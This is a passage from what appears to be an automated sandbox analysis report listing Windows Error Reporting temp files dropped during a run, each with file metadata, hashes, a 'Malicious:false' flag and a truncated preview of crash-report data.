                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER932E.tmp.WERInternalMetadata.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8316
                                                                                                                                                                    Entropy (8bit):3.69408943674511
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:R6l79RJXE6Y6YwRSUTHgRgmfw7hcpr189b3+sfV9m:R6lXJU6Y6YmSUTHEgmfw7hT39fO
                                                                                                                                                                    MD5:D4C80D3E65ED5B393A8E57AE669584FF
                                                                                                                                                                    SHA1:FB451888A0B2394B6BFCC425CFBF1236B8653290
                                                                                                                                                                    SHA-256:340DD3CEBD01E36F0E70FB6560375B04F14C6E7CC1420AB9FB75379A41790068
                                                                                                                                                                    SHA-512:D456B472381E52ACC41702D9347B94EC34DBB263CDC9AB3540972A02C914BB2BA8919DB4F93EE087C3895212D4ABC68990CB012A0EE9B498E05D04A8A950AA7B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...3.4.4.8...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.3.4.4.8.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.2.0.<./.P.i.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER937D.tmp.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4619
                                                                                                                                                                    Entropy (8bit):4.445587606363455
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwr7SGl8zshJgkZ7aI9FSWpW8VYcYm8M4JjD+AxFr+q8LXaZdCRj63Xd:uIafzh7Pz7VEJjDfHmXCdKIXd
                                                                                                                                                                    MD5:5AA7C634D10A79F2D36E001045C76E21
                                                                                                                                                                    SHA1:C923A74DEEDB77AC1EB29913570E1890AFEF88D7
                                                                                                                                                                    SHA-256:F692FAA07C912BF56186E9BD10AB8570074009C07EB643AD8E219C35DC8CF6AC
                                                                                                                                                                    SHA-512:28442988FEB996EB3FD7C1369B61E30C6BE53F14E79E03920CBB5CFC971FA2C1B1F25B4C43977A4E591E9F48212B3CEC40B8C2AC3F51E89034A2CD6B7594A1E8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="3448" />.. <arg nm="verqfe" val="3448" />.. <arg nm="csdbld" val="3448" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222528661" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER939A.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):87450
                                                                                                                                                                    Entropy (8bit):3.0541562377324283
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:jcK2Vk7fBVXdXtPADX44VwF17wns8fXbsaI+GZk+B6+1U2lhusP:jcK2Vk7fBVXdXtPADX44VwF17wns8vbU
                                                                                                                                                                    MD5:FFD690AF6E9F973CE01093248D7D2BA7
                                                                                                                                                                    SHA1:D930CA3100E5A8FA0BB98316CFE06FE6C7C50219
                                                                                                                                                                    SHA-256:1FED334840FEB7DED027FD2B06F1113E14FD4087C924457F103857E894D37856
                                                                                                                                                                    SHA-512:3B1D0B7A1BD1B3514FF5FECB1D47FD943CA4A6AB1D80586B0E1D02029DA5C5C1F88B96595DA19236FEFD81E8FB31ABC8497E00FE271E2BDA38B65D4988168E93
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER94C.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6978521857440483
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWiKeWylTYzYqy/WREHqYEZCECtFi17QFCwEq1dZvaEHCQQM7fkIIH2N:2ZDiKMEAwCEEhaEHTQMjkvH2N
                                                                                                                                                                    MD5:EE53DCF83D66E75C86AE43CB89F42400
                                                                                                                                                                    SHA1:C21C262A431F0211BCB455C1DF5D9A84051F74E5
                                                                                                                                                                    SHA-256:D74192FC2E4FEC6780325D0E948B98CAC4C11D6DDAA7ECF1542F70D044AB5429
                                                                                                                                                                    SHA-512:1DCFF3559914CDD3D67155BB59D5BF05C1C2C5798777129410A358725C203B007CFC803C7C326DEFE68D9F187A57DF66A46BB00AF9CDD34BCE57F9980174CCB3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER94C4.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6839220551391407
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWrwYkg0TtwtYXYtWnHYYEZ57htFiaVxgfw48Es2a85NM1QbIF93:2ZDrwYr9tA42s2a85NM1QUF93
                                                                                                                                                                    MD5:BCB0DDDA2552DE9ACDA969164601515D
                                                                                                                                                                    SHA1:D2EC7172134147A221E1F1CDEB9317C1EF0A0FC1
                                                                                                                                                                    SHA-256:31BFCF47B6EFF35742C5CBB3908115E1A91D7A663D615D34D25959272D8A6BE5
                                                                                                                                                                    SHA-512:AA65BCA2C4B347494862914C4ACE9C5782D2E1A612273CDAA5C56F0EDED797DD9B7A8061C5639C8502BB10BED410948B64ADD5A77319A85F3DA848D1E7D03340
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER97A4.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6874409553694423
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYW/M4gudYcY9PWfHqYEZ4S7tFiH78/4wfkPBxaqTDMFHCIsv3:2ZDzVrFS9caqTDMFHlsv3
                                                                                                                                                                    MD5:71291B326D3C1F536DE9265B70D1E6BA
                                                                                                                                                                    SHA1:66591B7DFCBE43F34D448B7425595ACD3D6077AB
                                                                                                                                                                    SHA-256:B0530BDF05F0250E8BC9462D41D3AA55075AB4F2D51FD8E42EDA465DD31677F0
                                                                                                                                                                    SHA-512:66401BDAD1869554FB55C13BEACA876B6B73B2CC399CF77B91AE763E0CD51A8D31FA2151E1979CA24D0E27A2FCE1791F6E3F24133259D886E58D38C1B59EEFD4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER9BCB.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):91194
                                                                                                                                                                    Entropy (8bit):3.054937521157893
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:rVNEA+ndQ4JAQTs8Jg6q2ZiC20n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+S:rVNEA+ndQ4JAQTs8Jg6q2ZB20n+sI+EF
                                                                                                                                                                    MD5:A3D461DC9BED4C00098109C8912F4983
                                                                                                                                                                    SHA1:A691DD2374A6670B6345A5A8BEE406F7B9F81C54
                                                                                                                                                                    SHA-256:DC71497B02F9CE79A20A563535D0944CD92A3E7F294426BBBFE737027D2AC841
                                                                                                                                                                    SHA-512:CF7380E87BC8716302AA647BFA553898BAAA1AE26D7227F6EC91979D819AF49449858E76151E48EDB60182ADBE5F1E3B6DE1A481D87210B51463D354500126EA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DA1.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.687482918238326
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYW6uIKXvoY8YQowWkhH2YEZsYtFiP7N/L6wMNLaPTCMqhUIq0v3:2ZDcb9+ZaPTCMqhDXv3
                                                                                                                                                                    MD5:6E570A7B5E2E5257AD7EEAAA4015B20F
                                                                                                                                                                    SHA1:C14A03AD4F301DA1B61A74699C233BC9493BB320
                                                                                                                                                                    SHA-256:4AFEBCC85B1BA92EDCC627657B9A2F251F0D8C3C894D3AE414F997E85D9FBB2C
                                                                                                                                                                    SHA-512:B2A9988DEBF7A65651566C56C6D97D7D79347B16A72FF7FF1D66AAE0C0CF3CE979CCC6ADFEBF52443F7BF90A67C3DC8D68E2933CB625A920DC812A40B79F7511
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA023.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):91618
                                                                                                                                                                    Entropy (8bit):3.0540015252045887
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:EcrNZk/ndCnpgCMo8JFhWxZiK20n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+mA:EcrNZk/ndCnpgCMo8JFhWxZZ20n+sI+R
                                                                                                                                                                    MD5:129EBBF0DAC8F4AD3EEE1C17D0095496
                                                                                                                                                                    SHA1:0C11C48BE4A6DB90CF6C2B68EB9CAA6B16325BB8
                                                                                                                                                                    SHA-256:33584F1048B923FDA9D9D29D0C83D0167A90BC3E460ACE1551C71A912FEA7D5A
                                                                                                                                                                    SHA-512:9FD8635EC00F2A521B32747B28692389E96A05F16AF7124612782B066F2ED43F5D82016F32F29BB00DACC01C50429245769E0EFB5F08BD7D300E31F46A9383FD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA12D.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6870562226765036
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWzxajM24YYaYW5WyH2YEZlitFiS7h/LwwALTaoTTqMJhlIq0v3:2ZDn69CtHaoTTqMJh6Xv3
                                                                                                                                                                    MD5:81766DA1221635F828D2E16E38D6B0DF
                                                                                                                                                                    SHA1:4D5B9052946B8C9D4DAABD74CAFFD11B809DD98B
                                                                                                                                                                    SHA-256:B94ECEEBBC61565B70925729AFECD6A6843DB6AA9FD48D13B230B22D1EBC7AB5
                                                                                                                                                                    SHA-512:DA92C4A7B34B3B4BB8440C3EAC66840B27398583CF0C246854B76B2C6D6299811E89C6EC73705334A6C976F69166D7D973D87CD6335038B9377EEC376F34A0EE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA620.tmp.csv

                                                                                                                                                                    Download File
